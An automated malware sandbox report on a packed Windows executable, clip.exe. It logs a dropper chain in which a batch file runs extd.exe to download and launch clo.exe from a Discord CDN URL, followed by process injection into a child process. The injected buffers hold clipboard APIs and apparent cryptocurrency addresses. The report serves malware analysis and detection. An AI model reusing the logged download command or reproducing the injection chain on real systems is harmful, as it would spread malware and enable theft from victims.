Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	July 31, 2021, 1:26 p.m.	July 31, 2021, 2:03 p.m.

Size	446.5KB
Type	PE32+ executable (GUI) x86-64, for MS Windows
MD5	`17b0dca4c5d5c3037c814ac1a253082b`
SHA256	`0389ffef740d3bd365f2b699ac006b478a5346a1dc2383e10fd5152771641c0b`
CRC32	`F4C77DA8`
ssdeep	`12288:QbjDhu9T09gUX6yBedMSGu+wTS0TMLeYfS9UiDa:e1eT0PqyodsXwO0c6eiDa`
Yara	IsPE64 - (no description) UPX_Zero - UPX packed file Malicious_Library_Zero - Malicious_Library PE_Header_Zero - PE File Signature

clip.exe "C:\Users\test22\AppData\Local\Temp\clip.exe"
1600
- cmd.exe "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\530E.bat C:\Users\test22\AppData\Local\Temp\clip.exe"
  2172
  - extd.exe C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
    2264
  - extd.exe C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" ""
    2312
  - extd.exe C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe" "clo.exe" "" "" "" "" "" ""
    2364
  - clo.exe clo.exe
    2444
    - clo.exe C:\Users\test22\AppData\Local\Temp\1245\clo.exe
      2748
  - extd.exe C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe "/sleep" "900000" "" "" "" "" "" "" ""
    2532

Name	Response	Post-Analysis Lookup
ocsp.digicert.com	CNAME cs9.wac.phicdn.net A 117.18.237.29	117.18.237.29
cdn.discordapp.com	A 162.159.135.233 A 162.159.134.233 A 162.159.129.233 A 162.159.130.233 A 162.159.133.233	162.159.135.233

IP Address	Status	Action
117.18.237.29	Active	Moloch
162.159.129.233	Active	Moloch
164.124.101.2	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.102:49169 162.159.129.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78

Checks if process is being debugged by a debugger (6 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0
IsDebuggerPresent July 31, 2021, 1:27 p.m.			0	0

Command line console output was observed (2 events)

Time & API	Arguments	Status	Return	Repeated
WriteConsoleW July 31, 2021, 1:27 p.m.	buffer: ffsf console_handle: 0x0000000000000007	1	1	0
WriteConsoleW July 31, 2021, 1:27 p.m.	buffer: ffff console_handle: 0x0000000000000007	1	1	0

Uses Windows APIs to generate a cryptographic key (3 events)

Time & API	Arguments	Status	Return
CryptExportKey July 31, 2021, 1:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c8458 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c84d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 31, 2021, 1:27 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x004c84d8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 31, 2021, 1:27 p.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (1 event)

section

.code

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header

suspicious_request

GET https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe

Performs some HTTP requests (2 events)

request	GET http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTBL0V27RVZ7LBduom%2FnYB45SPUEwQU5Z1ZMIJHWMys%2BghUNoZ7OrUETfACEAo3h2ReX7SMIk79G%2B0UDDw%3D
request	GET https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe

Allocates read-write-execute memory (usually to unpack itself) (27 events)

Time & API	Arguments	Status
NtProtectVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2264 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa6b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2312 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa6b7000 process_handle: 0xffffffffffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2364 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa6b7000 process_handle: 0xffffffffffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 851968 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x007e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a71000 process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73a72000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 1572864 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02170000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x022b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00432000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00465000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0046b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00467000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00770000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00457000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00456000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0044a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0043c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0045b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0079f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00790000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00771000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2444 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00772000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2532 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x000007fefa6b7000 process_handle: 0xffffffffffffffff	1

Creates executable files on the filesystem (3 events)

file	C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\530E.bat
file	C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe
file	C:\Users\test22\AppData\Local\Temp\1245\clo.exe

Creates a suspicious process (1 event)

cmdline

"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\530E.bat C:\Users\test22\AppData\Local\Temp\clip.exe"

Drops an executable to the user AppData folder (1 event)

file	C:\Users\test22\AppData\Local\Temp\1245\clo.exe

The binary likely contains encrypted or compressed data indicative of a packer (2 events)

section

{u'size_of_data': u'0x00052200', u'virtual_address': u'0x00022000', u'entropy': 7.998971853613915, u'name': u'.rsrc', u'virtual_size': u'0x00052150'}

entropy

7.99897185361

description

A section with a high entropy has been found

entropy

0.737373737374

description

Overall entropy of this PE file is high

Yara rule detected in process memory (47 events)

description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep
description	Communication using DGA	rule	Network_DGA
description	Communications use DNS	rule	Network_DNS
description	Communications over RAW Socket	rule	Network_TCP_Socket
description	Create a windows service	rule	Create_Service
description	Record Audio	rule	Sniff_Audio
description	Escalate priviledges	rule	Escalate_priviledges
description	Run a KeyLogger	rule	KeyLogger
description	Code injection with CreateRemoteThread in a remote process	rule	Code_injection
description	Communications over HTTP	rule	Network_HTTP
description	Match Windows Inet API call	rule	Str_Win32_Internet_API
description	Communications over FTP	rule	Network_FTP
description	Take ScreenShot	rule	ScreenShot
description	Match Windows Http API call	rule	Str_Win32_Http_API
description	Steal credential	rule	local_credential_Steal
description	File Downloader	rule	Network_Downloader
description	Communications over P2P network	rule	Network_P2P_Win
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerCheck__RemoteAPI
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	DebuggerException__ConsoleCtrl
description	(no description)	rule	DebuggerException__SetConsoleCtrl
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	(no description)	rule	Check_Dlls
description	Checks if being debugged	rule	anti_dbg
description	Anti-Sandbox checks for ThreatExpert	rule	antisb_threatExpert
description	Bypass DEP	rule	disable_dep
description	Affect hook table	rule	win_hook
description	(no description)	rule	DebuggerCheck__GlobalFlags
description	(no description)	rule	DebuggerCheck__QueryInfo
description	(no description)	rule	DebuggerHiding__Thread
description	(no description)	rule	DebuggerHiding__Active
description	(no description)	rule	ThreadControl__Context
description	(no description)	rule	SEH__vectored
description	Checks if being debugged	rule	anti_dbg
description	Bypass DEP	rule	disable_dep

Terminates another process (4 events)

Time & API	Arguments	Status
NtTerminateProcess July 31, 2021, 1:27 p.m.	status_code: 0xffffffff process_identifier: 2588 process_handle: 0x00000210
NtTerminateProcess July 31, 2021, 1:27 p.m.	status_code: 0xffffffff process_identifier: 2588 process_handle: 0x00000210	1
NtTerminateProcess July 31, 2021, 1:27 p.m.	status_code: 0xffffffff process_identifier: 2712 process_handle: 0x00000210
NtTerminateProcess July 31, 2021, 1:27 p.m.	status_code: 0xffffffff process_identifier: 2712 process_handle: 0x00000210	1

Uses Windows utilities for basic Windows functionality (1 event)

cmdline

"C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\530E.bat C:\Users\test22\AppData\Local\Temp\clip.exe"

Creates an Alternate Data Stream (ADS) (4 events)

file	C:\Users\test22\AppData\Local\Temp\goto:eof
file	C:\Users\test22\AppData\Local\Temp\1245\call:extd
file	C:\Users\test22\AppData\Local\Temp\1245\goto:eof
file	C:\Users\test22\AppData\Local\Temp\call:extd

Allocates execute permission to another process indicative of possible code injection (3 events)

Time & API	Arguments	Status	Return
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2588 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000210		3221225496
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2712 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000210		3221225496
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2748 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000210	1	0

Deletes executed files from disk (2 events)

file	C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp
file	C:\Users\test22\AppData\Local\Temp\530C.tmp

Drops a binary and executes it (2 events)

file	C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe
file	C:\Users\test22\AppData\Local\Temp\1245\clo.exe

Manipulates memory of a non-child process indicative of process injection (6 events)

Time & API	Arguments	Return	Repeated
Process injection	Process 2444 manipulating memory of non-child process 2588
Process injection	Process 2444 manipulating memory of non-child process 2712
NtUnmapViewOfSection July 31, 2021, 1:27 p.m.	base_address: 0x00400000 region_size: 774144 process_identifier: 2588 process_handle: 0x00000210	3221225497	0
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2588 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000210	3221225496	0
NtUnmapViewOfSection July 31, 2021, 1:27 p.m.	base_address: 0x00400000 region_size: 708608 process_identifier: 2712 process_handle: 0x00000210	3221225497	0
NtAllocateVirtualMemory July 31, 2021, 1:27 p.m.	process_identifier: 2712 region_size: 20480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 allocation_type: 12288 (MEM_COMMIT\|MEM_RESERVE) process_handle: 0x00000210	3221225496	0

Potential code injection by writing to the memory of another process (4 events)

Time & API	Arguments	Status	Return
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: MZÿÿ¸@Àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁÓw¯ÏÓw¯ÏÓw¯Ï®ÎÖw¯ÏÓw®ÏÙw¯ÏJ¦ÎÖw¯ÏJÎÒw¯ÏRichÓw¯ÏPEL¡Æî`àI @P@Ø)(@ìì(8 .textá `.rdatal @@.dataL0@À.relocì@ @B base_address: 0x00400000 process_identifier: 2748 process_handle: 0x00000210	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: (:HPG2A/CLP/05/RYS1KCU1upyTnLHbVXCw4CuQvkxFwwMU6eb243DBpxVQ1kdYoJbWwux2Bfz54BfMB5Z2CQ4bc1qq3e09ltqvuzg903dxs7qhhajkel95rzwu4f2y2LaMw5ctk956V3hrtqfco6EzYzWioaGtQRrMPeYRpxQTaWpxt6RuXwqtf3T3FzWFBfbP2ltc1qwjd79y7pk34qunyk8zpz3dllekd7x54pvemhaa0x1c75A4Abe39e8F2984a1c66A898BF7E0b5c3E7E100000L0000T00MON00000000000000000000000LaMw5ctk956V3hrtqfco6EzYzWioaGtQRr00000000000000W000000084gR9n7jyYwQjW3ccMXuB1MpQaNMJ3AsKUzxDTaK9eWr2hch4ZqF18aAfCxVWQiF8G8NSL33xksEL98WFhLgXPLjQNFpwDsD7G1qQZYtFg4tJxtGRpZTMP5id2zd8sfeCaddr1q9xxn652n0wh0pk3h6guecvh6pxrkgp06rlm80tvsxpqkzqh0zxr9yhqkaawf34l8k8w0cdac0k6cljggt9jtftwmz3q8826j9Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPEZ1KCU1upyTnLHbVXCw4CuQvkxFwwMU6eb24t1YyT26xv4ZAHWTxqqHUoWcW9NhZ7SQoYMjbnb1g9wjgxzzgksqmyfsnppeqgr8yj66zwj8ld90mjkernel32.dllLoadLibraryWShlwapi.dllntdll.dllShell32.dllOle32.dllUser32.dllGetProcAddressGetModuleFileNameWCreateDirectoryWGlobalAllocGlobalFreeGlobalLockGlobalUnlockLocalAllocLocalFreelstrlenWStrChrWStrStrWStrStrIWStrToIntExWPathIsDirectoryWCoInitializeHeapFreeCreateMutexACreateMutexWGetLastErrorSHGetFolderPathAPathAppendWStringCbPrintfWmemsetwmemsetmemcpyOpenClipboardGetClipboardDataEmptyClipboardSetClipboardDataCloseClipboard @ #@`"@($@&@¸%@°!@h!@à#@8 @È @ @p%@ø$@"@ !@¡Æî` ´$)$¡Æî`GCTLá.text$mn .idata$5 .rdata$)´.rdata$zzzdbgØ).idata$2ì).idata$3.idata$4T.idata$60L.bss^* (:HP*ÄLoadLibraryW®GetProcAddress^ExitProcess}Sleep4GlobalFreeKERNEL32.dll base_address: 0x00402000 process_identifier: 2748 process_handle: 0x00000210	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: Ä0 0 0&0.030:0C0H0Q0V0^0c0k0p0y0~00000¤0«0°0¶0¼0Á0Ç0Í0Ò0Ø0Þ0ã0é0ï0ô0ú0111111%1*10161;1A1G1L1S1X1_1d1k1s1z1111111£1¨1®1´1¹1À1È1Ï1×1Þ1ã1ê1ï1ö1û1222222#2)2.242:2?2E2K2R2Û2í2þ233$3=3P3h333¢3¯3»3È3á3í34%424K4Z4444¸4Ê4Ø4å4ò455'5<5J5W5d5p5}55¢5Õ5â5ï56!6:6S6l666·6Ð6Ü67(747V7c7p777¥7±7Ð7Ý7ê7ù788.8J8W8d8s888º8Å8Ì8Ö8Þ8è8ñ8÷8þ89 9-9:9@9X9b9h9w99¥9 :?:h::::ª:a;n;; ;Õ;<3<±<Ê<Ö<5=B=O=\=q=Ð=Ý=ê=÷=>ª>·>Ä>Ñ> (¬8°8´8¸8¼8À8Ä8È8Ì8Ð8Ô8Ø8Ü8à8ä8è8 base_address: 0x00404000 process_identifier: 2748 process_handle: 0x00000210	1	1
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: @ base_address: 0x7efde008 process_identifier: 2748 process_handle: 0x00000210	1	1

Code injection by writing an executable or DLL to the memory of another process (1 event)

Time & API	Arguments	Status	Return	Repeated
WriteProcessMemory July 31, 2021, 1:27 p.m.	buffer: MZÿÿ¸@Àº´ Í!¸LÍ!This program cannot be run in DOS mode. $ÁÓw¯ÏÓw¯ÏÓw¯Ï®ÎÖw¯ÏÓw®ÏÙw¯ÏJ¦ÎÖw¯ÏJÎÒw¯ÏRichÓw¯ÏPEL¡Æî`àI @P@Ø)(@ìì(8 .textá `.rdatal @@.dataL0@À.relocì@ @B base_address: 0x00400000 process_identifier: 2748 process_handle: 0x00000210	1	1	0

Used NtSetContextThread to modify a thread in a remote process indicative of process injection (2 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 2444 called NtSetContextThread to modify thread in remote process 2748
NtSetContextThread July 31, 2021, 1:27 p.m.	registers.eip: 1997996484 registers.esp: 2882360 registers.edi: 0 registers.eax: 4200777 registers.ebp: 0 registers.edx: 0 registers.ebx: 2130567168 registers.esi: 0 registers.ecx: 0 thread_handle: 0x0000020c process_identifier: 2748	1	0	0

Resumed a suspended thread in a remote process potentially indicative of process injection (6 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 1600 resumed a thread in remote process 2172
Process injection	Process 2172 resumed a thread in remote process 2444
Process injection	Process 2444 resumed a thread in remote process 2748
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000234 suspend_count: 1 process_identifier: 2172	1	0	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000078 suspend_count: 0 process_identifier: 2444	1	0	0
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000020c suspend_count: 1 process_identifier: 2748	1	0	0

Executed a process and injected code into it, probably while unpacking (30 events)

Time & API	Arguments	Status	Return
NtResumeThread July 31, 2021, 1:26 p.m.	thread_handle: 0x00000000000000b4 suspend_count: 1 process_identifier: 1600	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2176 thread_handle: 0x0000000000000234 process_identifier: 2172 current_directory: C:\Users\test22\AppData\Local\Temp\ filepath: C:\Windows\System32\cmd.exe track: 1 command_line: "C:\Windows\system32\cmd.exe" /c "C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\530E.bat C:\Users\test22\AppData\Local\Temp\clip.exe" filepath_r: C:\Windows\system32\cmd.exe stack_pivoted: 0 creation_flags: 67634196 (CREATE_DEFAULT_ERROR_MODE\|CREATE_NEW_CONSOLE\|CREATE_SUSPENDED\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 0 process_handle: 0x000000000000023c	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000234 suspend_count: 1 process_identifier: 2172	1	0
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2268 thread_handle: 0x000000000000006c process_identifier: 2264 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000070	1	1
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2316 thread_handle: 0x0000000000000068 process_identifier: 2312 current_directory: C:\Users\test22\AppData\Local\Temp filepath: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe "/random" "90000009" "" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000078	1	1
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2368 thread_handle: 0x000000000000000c process_identifier: 2364 current_directory: C:\Users\test22\AppData\Local\Temp\1245 filepath: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe track: 1 command_line: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/868908533897363470/870626071547097128/clo.exe" "clo.exe" "" "" "" "" "" "" filepath_r: C:\Users\test22\AppData\Local\Temp\530C.tmp\530D.tmp\extd.exe stack_pivoted: 0 creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1
CreateProcessInternalW July 31, 2021, 1:27 p.m.	thread_identifier: 2448 thread_handle: 0x0000000000000078 process_identifier: 2444 current_directory: filepath: C:\Users\test22\AppData\Local\Temp\1245\clo.exe track: 1 command_line: clo.exe filepath_r: C:\Users\test22\AppData\Local\Temp\1245\clo.exe stack_pivoted: 0 creation_flags: 525328 (CREATE_NEW_CONSOLE\|CREATE_UNICODE_ENVIRONMENT\|EXTENDED_STARTUPINFO_PRESENT) inherit_handles: 1 process_handle: 0x0000000000000068	1	1
NtResumeThread July 31, 2021, 1:27 p.m.	thread_handle: 0x0000000000000078 suspend_count: 0 process_identifier: 2444	1	0
